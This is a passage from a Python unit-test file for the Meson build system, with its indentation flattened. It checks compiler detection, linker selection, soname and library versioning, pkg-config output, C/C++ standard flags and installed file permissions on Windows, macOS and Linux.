self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity0.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
